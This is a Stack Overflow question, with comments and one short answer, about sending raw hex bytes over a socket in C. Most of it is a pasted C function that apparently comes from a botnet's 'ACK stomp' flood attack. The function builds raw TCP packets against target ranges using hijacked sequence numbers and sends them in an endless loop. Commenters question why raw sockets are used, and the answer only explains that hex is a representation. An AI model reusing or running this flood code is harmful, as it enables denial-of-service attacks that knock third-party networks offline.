send hex data within socket in C

Question

I need to send a hex data within raw socket in C.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #OPENS NEW SOCKET
inputHex = binascii.unhexlify("1000020a4767b525156d5de2957833a5")
s.connect((ip,port))#SOCKET CONNECTION
s.send(inputHex)

This python script works well but i can't get it work in C

    char* user_payload = attack_get_opt_str(opts_len, opts, ATK_OPT_PAYLOAD, NULL);

    if (user_payload) {
        data_len = util_strlen(user_payload);
        randmin = data_len;
        randmax = data_len;
    }
    
    // Set up receive socket
    if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
    {
        //printf("Could not open raw socket!\n");
        return NULL;
    }
    i = 1;
    if (setsockopt(rfd, IPPROTO_IP ,IP_HDRINCL, &i, sizeof (int)) == -1)
    {
        //printf("Failed to set IP_HDRINCL. Aborting\n");
        close(rfd);
        return NULL;
    }
    
    // Retrieve all ACK/SEQ numbers
    for (i = 0; i < targs_len; i++)
    {
        int fd;                     
        struct sockaddr_in addr, recv_addr;
        socklen_t recv_addr_len;
        char pktbuf[256];
        time_t start_recv;
        stomp_setup_nums:
        if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
            //printf("Failed to create socket!\n");
            continue;
        }

          //Set it in nonblocking mode
          fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);

        // Set up address to connect to
        addr.sin_family = AF_INET;
        if (targs[i].netmask < 32)
            addr.sin_addr.s_addr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
        else
            addr.sin_addr.s_addr = targs[i].addr;
        if (dport == 0xffff)
            addr.sin_port = rand_next() & 0xffff;
        else
            addr.sin_port = htons(dport);
            // Actually connect, nonblocking
        connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
        //usleep(500000);
        start_recv = time(NULL);    
        // Get info
        while (TRUE)
        {
            int ret;

            recv_addr_len = sizeof (struct sockaddr_in);
            ret = recvfrom(rfd, pktbuf, sizeof (pktbuf), MSG_NOSIGNAL, (struct sockaddr *)&recv_addr, &recv_addr_len);
            if (ret == -1)
            {
#ifdef DEBUG
                //printf("Could not listen on raw socket!\n");
#endif
                return NULL;
            }
            if (recv_addr.sin_addr.s_addr == addr.sin_addr.s_addr && ret > (sizeof (struct iphdr) + sizeof (struct tcphdr)))
            {
                struct tcphdr *tcph = (struct tcphdr *)(pktbuf + sizeof (struct iphdr));

                if (tcph->source == addr.sin_port)
                {
                    if (tcph->syn && tcph->ack)
                    {
                        char *payload;
                        stomp_data[i].addr = addr.sin_addr.s_addr;
                        stomp_data[i].seq = ntohl(tcph->seq);
                        stomp_data[i].ack_seq = ntohl(tcph->ack_seq);
                        stomp_data[i].sport = tcph->dest;
                        stomp_data[i].dport = tcph->source;                 
#ifdef DEBUG
                        //printf("ACK Stomp got SYN+ACK!\n");
#endif
                        // Set up the packet
                        struct iphdr *iph;
                        struct tcphdr *tcph;                        
                        pkts[i] = malloc(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
                        iph = (struct iphdr *)pkts[i];
                        tcph = (struct tcphdr *)(iph + 1);
                        payload = (char *)(tcph + 1);
                        iph->version = 4;
                        iph->ihl = 5;
                        iph->tos = 0;
                        iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
                        iph->id = htons(0xffff);
                        iph->ttl = ip_ttl;
                        iph->frag_off = htons(1 << 14);
                        iph->protocol = IPPROTO_TCP;
                        iph->saddr = LOCAL_ADDR;
                        iph->daddr = stomp_data[i].addr;
                        tcph->source = stomp_data[i].sport;
                        tcph->dest = stomp_data[i].dport;
                        tcph->doff = 5;
                        tcph->fin = TRUE;
                        tcph->ack = TRUE;
                        tcph->urg = urg_fl;
                        tcph->ack = ack_fl;
                        tcph->psh = psh_fl;
                        tcph->rst = rst_fl;
                        tcph->syn = syn_fl;
                        tcph->fin = fin_fl;
                        rand_str(payload, data_len);
                        break;
                    }
                    else if (tcph->fin || tcph->rst)
                    {
                        close(fd);
                        goto stomp_setup_nums;
                    }
                }
            }

            if (time(NULL) - start_recv > 10)
            {
#ifdef DEBUG
                //printf("Couldn't connect to host for ACK Stomp in time. Retrying\n");
#endif
                    close(fd);

                goto stomp_setup_nums;
            }
        }
    }

    // Start spewing out traffic
    //printf("Sending\n");
    BOOL set_payload = FALSE;
    while (TRUE)
    {
        for (i = 0; i < targs_len; i++)
        {
            char *pkt = pkts[i];
            struct iphdr *iph = (struct iphdr *)pkt;
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
            char *data = (char *)(tcph + 1);

            iph->id = rand_next() & 0xffff;
            
            if (!user_payload)
                rand_str(data, data_len);
            else {
                if (!set_payload) {
                    util_memcpy(data, user_payload, data_len);
                    set_payload = TRUE;
                }
            }
            
            if (sleeptime != 0)
                usleep(sleeptime);

            iph->check = 0;
            iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
            tcph->window = htons(64000 + (rand_next()%1500)); // Randomize Window in every packet
            tcph->seq = htons(stomp_data[i].ack_seq++);
            tcph->ack_seq = htons(stomp_data[i].seq);   
            tcph->check = 0;
            tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + data_len), sizeof (struct tcphdr) + data_len);

            targs[i].sock_addr.sin_port = tcph->dest;
            sendto(rfd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
        }
    }
}

As it look in tcpdump it sends the data as string

The purpose in doing that is creating a firewall that checks the payload in hex with the first incoming psh.ack packet. If it is the correct hex then you will pass.

0x0000:  4500 0048 a6b5 0000 4006 0018 c0a8 3480  E..H....@.....4.
0x0010:  2f5a af60 9342 1625 c07a cadd 7c35 100a  /Z.`.B.%.z..|5..
0x0020:  58d8 faf0 4148 1608 3130 3030 3032 3061  X...AH..1000020a
0x0030:  3034 3430 6235 3235 3135 3664 3564 6532  0440b525156d5de2
0x0040:  3634 3839 3333 6135                      648933a5

Please try to create a proper [mre] of the code you have problems with. Also please take some time to read [the help pages](http://stackoverflow.com/help), take the SO [tour], read [ask], as well as [this question checklist](https://codeblog.jonskeet.uk/2012/11/24/stack-overflow-question-checklist/). — Some programmer dude, Aug 29 '22 at 06:04
That isn't even valid C code. I suggest you put a breakpoint on the *real* code's `sendto` line and inspect the memory pointed to by `pkt`. Chances are it is *exactly* what is being sent, and was never converted from a hex string bytes. — WhozCraig, Aug 29 '22 at 06:05
And in the C program, you seem to be using raw sockets (instead of the simple TCP sockets used in the Python script), why? What is the purpose of the C program? What problem is it supposed to solve? — Some programmer dude, Aug 29 '22 at 06:06
@whozCraig the whole code in the answer below as i can't edit my question — CoreBot, Aug 29 '22 at 06:13
@Someprogrammerdudei just need to pass hex data over that socket .. im creating a firewall that checks the payload in hex with the first incomming psh.ack packet if it correct then you will pass — CoreBot, Aug 29 '22 at 06:16
And please learn how to **[edit]** your questions to improve them. Don't post edits as answers. — Some programmer dude, Aug 29 '22 at 06:17
As a hint: It seems like get the "hex" data as a string in your program. In Python you have the `unhexlify` to convert the string to raw binary data. Your C++ program doesn't seem to have that step. — Some programmer dude, Aug 29 '22 at 06:19
@Someprogrammerdude thats why i need to do as this function doing — CoreBot, Aug 29 '22 at 06:22
If your question is only about converting hex strings to binary data, you can find a solution here: [Hex to char array in C](https://stackoverflow.com/questions/1557400/hex-to-char-array-in-c) — Gerhardh, Aug 29 '22 at 06:47
"im creating a firewall that checks the payload in hex ..." There is no such thing as "payload in hex" within a packet except when you send a **string** containing hex digits. For any other data, the term "hex" does not have any meaning as it only refers to a specific textual representation of your raw data. — Gerhardh, Aug 29 '22 at 06:48
If your Python code works, you aren't sending hex at all, or expecting it either: and you aren't using a raw socket either, you are using a TCP socket. Unclear what you're asking. — user207421, Aug 29 '22 at 07:42

score 0 · Answer 1 · answered Sep 02 '22 at 11:52

0

TCP sends a "stream" of data, which is made up entirely of only 1s and 0s. "Hex" is a "way" of interpreting these 1s and 0s, NOT a "type" of data.

answered Sep 02 '22 at 11:52

Andrew

1
4
19

send hex data within socket in C

1 Answers1